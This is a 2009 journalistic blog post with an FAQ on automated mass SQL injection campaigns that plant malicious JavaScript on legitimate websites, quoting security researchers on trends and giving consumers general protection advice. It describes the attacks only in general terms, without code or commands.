<p>SQL injection attacks have been <a href="http://blogs.usatoday.com/technologylive/2009/03/no-one-can-say.html">around for years. </a>They require time and skill, and were traditionally done manually. A SQL attack involves querying the databases underlying a web page &#8212; until the database hiccups and accepts an injection of malicious code. The intruder then gains full access to the data, and a foothold to roam deeper. Socrates, the meth-addicted hacker I wrote about in <a href="http://zerodaythreat.com/"><em>Zero Day Threat,</em></a> used a <a href="http://lastwatchdog.com/criminal-hacking-grass-roots-level/">SQL hack </a>to break into a Michigan uniform company&#8217;s website to steal 3,000 customer profiles, which he gave to his love interest, Hula Girl. This was back in 2005.</p>
<p><img class="alignleft size-full wp-image-1068" title="ryan-barnett_crop" src="http://lastwatchdog.com/wp/wp-content/uploads/ryan-barnett_crop.bmp" alt="ryan-barnett_crop" />At some point in the spring of 2008, a bright hacker &#8220;had a Eureka moment,&#8221; says <a href="http://blog.modsecurity.org/2006/12/ryan-barnett-is.html">Ryan Barnett,</a> Breach Security&#8217;s Director of Research. Instead of trying to steal data from one website at a time, why not use botnets to probe the Internet for webpages whose databases could be easily injected with a small bit of code &#8212; just enough to implant backdoor infections.</p>
<p>&#8220;It was a brilliant tactical move,&#8221; says Barnett. &#8220;To say, &#8216;if our end goal is to obtain sensitive personal data, hey, wait a minute! Why are we only targeting databases that might hold the information? Why don&#8217;t we put malware on the sites, and when people go to the legitimate, regular websites; then people will get infected with our JavaScript? And we can install keystroke loggers and get the data that way.&#8217;&#8221;</p>
<p>&#8220;It was pretty crafty,&#8221; says Barnett.</p>
<p><strong>450,000 webpages attacked daily</strong></p>
<p>LastWatchdog has been unable to get anyone to estimate how many reputable websites have been tainted since then. But the number must be easily into the multi-millions of webpages. Automated SQL attacks <a href="http://www.theregister.co.uk/2008/04/24/mass_web_attack/">began surfacing last April</a> when 100,000 webpages of the British civil service, United Nations and U.S. Environmental Protection Agency were so hacked.</p>
<p><img class="alignleft size-full wp-image-1057" title="jeremiahgrossman_crop" src="http://lastwatchdog.com/wp/wp-content/uploads/jeremiahgrossman_crop.png" alt="jeremiahgrossman_crop" width="90" height="116" />&#8220;The current thinking is the bad guys, thought to be Chinese in origin, use search engine results to identify likely attack targets,&#8221; <a href="http://jeremiahgrossman.blogspot.com/">Jeremiah Grossman</a>, WhiteHat Security founder and CTO, told LastWatchdog in spring 2008. &#8220;Next they blindly send in malicious SQL injection traffic to the target websites . . . When someone visits one of these hundreds of thousands of infected web pages, their browser is instructed to connect to a hacker controlled site behind the scenes that exploits their browser and loads their machine with malware.&#8221;</p>
<p>For the first five months of 2008 IBM ISS helped large corporations block about 5,000 SQL attacks a day. By mid-June, daily attacks spiked to 25,000; by October they topped 450,000 a day. And keep this in mind: those blocks only protect corporations that retain IBM ISS to defend their networks. Websites that don&#8217;t pay for comparable protection are getting engulfed by the same wave of automated SQL injection attacks, says <a href="http://blogs.iss.net/archive/howtoprotectMS08-001.html">Holly Stewart</a>, IBM ISS threat response manager.</p>
<p>Cyber crime gangs are &#8220;finding tons of sites that have a set of conditions that will allow them to inject malicious software which will infect anyone who visits that site,&#8221; says <a href="http://www.ouncelabs.com/company/team.asp">Jack Danahy,</a> founder and CTO of security firm Ounce Labs.</p>
<p><strong>Everything you should know about SQL injection attacks</strong></p>
<p>Below is a FAQ on SQL injection attacks compiled by LastWatchdog with guidance from &#8212; and gratitude extended to &#8212; Breach Security, WhiteHat, IBM ISS, Guardium and Ounce Labs.</p>
<p><strong>Q:</strong> What is a SQL injection attack?</p>
<p><strong>A:</strong> SQL is the query language of the database layer underlying most websites. SQL attacks involve an unauthorized party injecting coding into one of these databases &#8212; coding that should not be there. An intruder can do this by typing coding into the browser URL address line, or into any box of any webform, such as those found on account logon pages or shopping carts.</p>
<p><strong>Q: </strong>How are SQL injection attacks typically carried out?</p>
<p><strong>A:</strong> Prior to the spring of 2008, SQL attacks were done manually. The hacker would try different database queries from the browser or from pages displaying web forms, until he successfully injected code into the underlying database. These types of attacks are still done, but on a smaller scale compared to the automated SQL infection/attacks that have come on strong.</p>
<p>Major banks and online merchants are putting up strong defenses, says <a href="http://www.linkedin.com/pub/0/0a4/406">Phil Neray,</a> vice-president of security strategy at Guardium. But regional banks and credit unions, smaller online retailers, and many government agencies remain highly vulnerable to manual, targeted SQL attacks.</p>
<p>As cited above, some 100,000 webpages of the British civil service, United Nations and U.S. Environmental Protection Agency were so hacked in spring 2008. More recently, Commerce Bank, a small Midwest bank that operates 360 branches in Missouri, Illinois and Kansas, Scarborough &amp; Tweed, a New Hampshire-based company that sells corporate gifts online, and a Rhode Island government Web site got hit, according to Neray.</p>
<p><strong>Q:</strong> Are manual SQL injections still a big concern?</p>
<p><strong>A: </strong>Yes. Manual, one-off SQL injection hackers are still out there making a living. Not only can these intruders clean out a customer database, they can get a foothold inside of the corporate network serving up the company&#8217;s website.</p>
<p>&#8220;We&#8217;ve seen numerous instances in which attacks leveraged SQL vulnerabilities in order to get inside of corporate networks and get access to internal systems and information that was not supposed to be exposed to the Internet,&#8221; says <a href="http://blogs.iss.net/archive/dnsnat.html">Tom Cross,</a> Manager, X-Force Advanced Research, at IBM ISS. &#8220;When we first started seeing this kind of attack occurring, it was pretty amazing how simple and straightforward it was, yet how deep the intruder could infiltrate the infrastructure and be relatively unseen.</p>
<p>&#8220;The bad guys are getting in and are not being detected,&#8221; Cross continued. &#8220;They&#8217;re finding and taking what they want and leaving, not bothering to clean up.&#8221;</p>
<p><strong>Q:</strong> What was the breakthrough that enabled automated SQL attacks?</p>
<p><strong>A:</strong> In the spring of 2008, a criminal coder discovered that Microsoft SQL databases would accept <a href="http://www.javascript.com/">JavaScript,</a> the shorthand coding that enables cool website features. Microsoft contends in this SQL security alert that there is nothing wrong with its database products. Instead, the software giant blames sloppy coding by web application developers who write the programs that tap into the underlying databases.</p>
<p>This discovery touched off a gold rush by <a href="http://lastwatchdog.com/hacking-bragging-rights-hacking-ill-gotten-profits/">white hat, black hat and grey hat</a> researchers to find security holes in widely used, off-the-shelf web applications. In 2008, researchers found 134% more web application vulnerabilities than in 2007. To be more precise, these were flaws that could enable the injection of JavaScript into Microsoft databases, according to IBM ISS.</p>
<p>What&#8217;s worse, to date 74% of these recently revealed SQL security holes have no available security patch.</p>
<p>Keep in mind those metrics apply to garden-variety web applications. Many websites use custom-made web applications; and these more sophisticated programs are even more susceptible to SQL attacks, says IBM&#8217;s Stewart.</p>
<p><strong>Q:</strong> So the bad guys discovered JavaScript could be injected into Microsoft databases via poorly written web applications. How did they make hay of that development?</p>
<p><strong>A: </strong>First, the bad guys developed tools to search out SQL vulnerabilities in off-the-shelf and custom web applications being used by web sites all across the Internet. &#8220;Automated tools that search for SQL injection vulnerabilities are able to find these vulnerabilities in standard and custom web applications alike,&#8221; says IBM&#8217;s Stewart.</p>
<p>Second, the bad guys began to instruct their botnets to inject malicious JavaScript into Microsoft databases, via flawed web applications, by the tens of thousands. &#8220;They figured out a way to scale it, and make it a broad attack,&#8221; says Barnett, of Breach Security.</p>
<p>The JavaScript didn&#8217;t do anything terribly invasive. It simply embedded an infection, so that anyone clicking to the tainted webpage thereafter got a backdoor installed &#8212; effectively turning full control of the machine over to the intruder.</p>
<p><strong>Q:</strong> What are the bad guys doing with all of this stolen personal data?</p>
<p><strong>A:</strong> ID theft, of course, begins with stolen data. And millions of tainted websites lurking to silently infect visitors with data stealers appear to be swelling the gigantic pool of stolen identity data, along with viral spam campaigns, such as Waledac and Koobface. And let&#8217;s not forget big data heists, such as the recent breach at Heartland Payment Systems.</p>
<p><img class="alignleft size-full wp-image-1065" title="avivah-litan" src="http://lastwatchdog.com/wp/wp-content/uploads/avivah-litan.bmp" alt="avivah-litan" />It&#8217;s not a coincidence that identity theft is also rising. Nearly twice as many people &#8212; 7.5% of all U.S. adults &#8212; lost money as part of some sort of financial fraud in 2008, according to this survey by Gartner banking analyst <a href="http://www.gartner.com/AnalystBiography?authorId=12030">Avivah Litan</a>. Last fall, Litan surveyed 5,000 consumers. She found 70% had never been a victim of identity theft fraud; 14% had had their credit card information used to charge purchases or get money; 7% said their debit card was used; 6% said a new account had been opened in their name; 5% had money transferred out of their account; and 4% had had checks forged.</p>
<p>&#8220;It&#8217;s not getting better, it&#8217;s getting worse,&#8221; says Litan. &#8220;I think this coming year will be more severe. A lot of stolen data has yet to be used.&#8221;</p>
<p><strong>Q:</strong> What can the average person do to avoid getting one of these infections?</p>
<p><strong>A:</strong> Do your homework and be ready to give up convenience. There are numerous consumer tools designed to assess the safety of the Web page you are about to click to, and tell you whether it&#8217;s safe. <a href="http://free.avg.com/faq.num-1241#faq_1241">AVG LinkScanner</a>, <a href="http://www.scansafe.com/resources/global_threat_reports2">ScanSafe</a>, <a href="http://www.siteadvisor.com/download/ff.html">McAfee SiteAdvisor</a>, <a href="http://www.enigmasoftware.com/">Enigma SpyHunter</a> and <a href="http://www.pcmag.com/article2/0,2817,2326037,00.asp">Authentium SafeCentral</a> are browser-based security tools worth checking out.</p>
<p><a href="http://www.winpatrol.com/"><img class="alignleft size-full wp-image-1059" title="winpatrol_scotty_plus" src="http://lastwatchdog.com/wp/wp-content/uploads/winpatrol_scotty_plus.gif" alt="winpatrol_scotty_plus" width="72" height="56" /></a>And here&#8217;s a tip: <a href="http://www.winpatrol.com/">WinPatrol</a> offers very powerful protection. It&#8217;s a terrific free tool, <a href="http://www.facebook.com/group.php?gid=49417927883">popular with techies</a> since it was created 10 years ago by <a href="http://billpstudios.blogspot.com/">Bill Pytlovany,</a> one of the original designers of AOL and a longtime open-source practitioner. The premier version, called <a href="http://winpatrol.stores.yahoo.net/winplusmemre.html">WinPatrol Plus</a>, costs just $30 for a lifetime subscription, which includes all updates, and is designed for the average consumer. WinPatrol takes a snapshot of your Windows run registry, and from then on blocks and alerts you to any new executable program, such as a malicious backdoor, that tries to install itself on your hard drive.</p>
<p>But that&#8217;s not enough. You must do all of your software updates promptly. Most SQL infections work by exploiting long-ago discovered security flaws in your browser &#8211; and in the programs that serve up Web-hosted video, music, photos, documents and work files. Keeping all of these web applications up to date will go a long way toward inoculating you.</p>
<p>This includes keeping current on updates for Internet Explorer, Firefox, Safari, Opera, Chrome, Adobe Flash, Adobe Reader, iTunes, QuickTime, Windows Media Player and RealPlayer. Microsoft and Mozilla do a credible job of alerting users to security updates for the IE and Firefox browsers, respectively. But the rest of the software vendors don&#8217;t make it clear the updates increasingly include security patches.</p>
<p><em>&#8211;by Byron Acohido</em></p>
<p><em>Photos of Ryan Barnett, Obama, Avivah Litan, Jeremiah Grossman</em></p>
]]></content:encoded>
			<wfw:commentRss>http://lastwatchdog.com/faq-sql-injection-attacks/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
	</channel>
</rss>
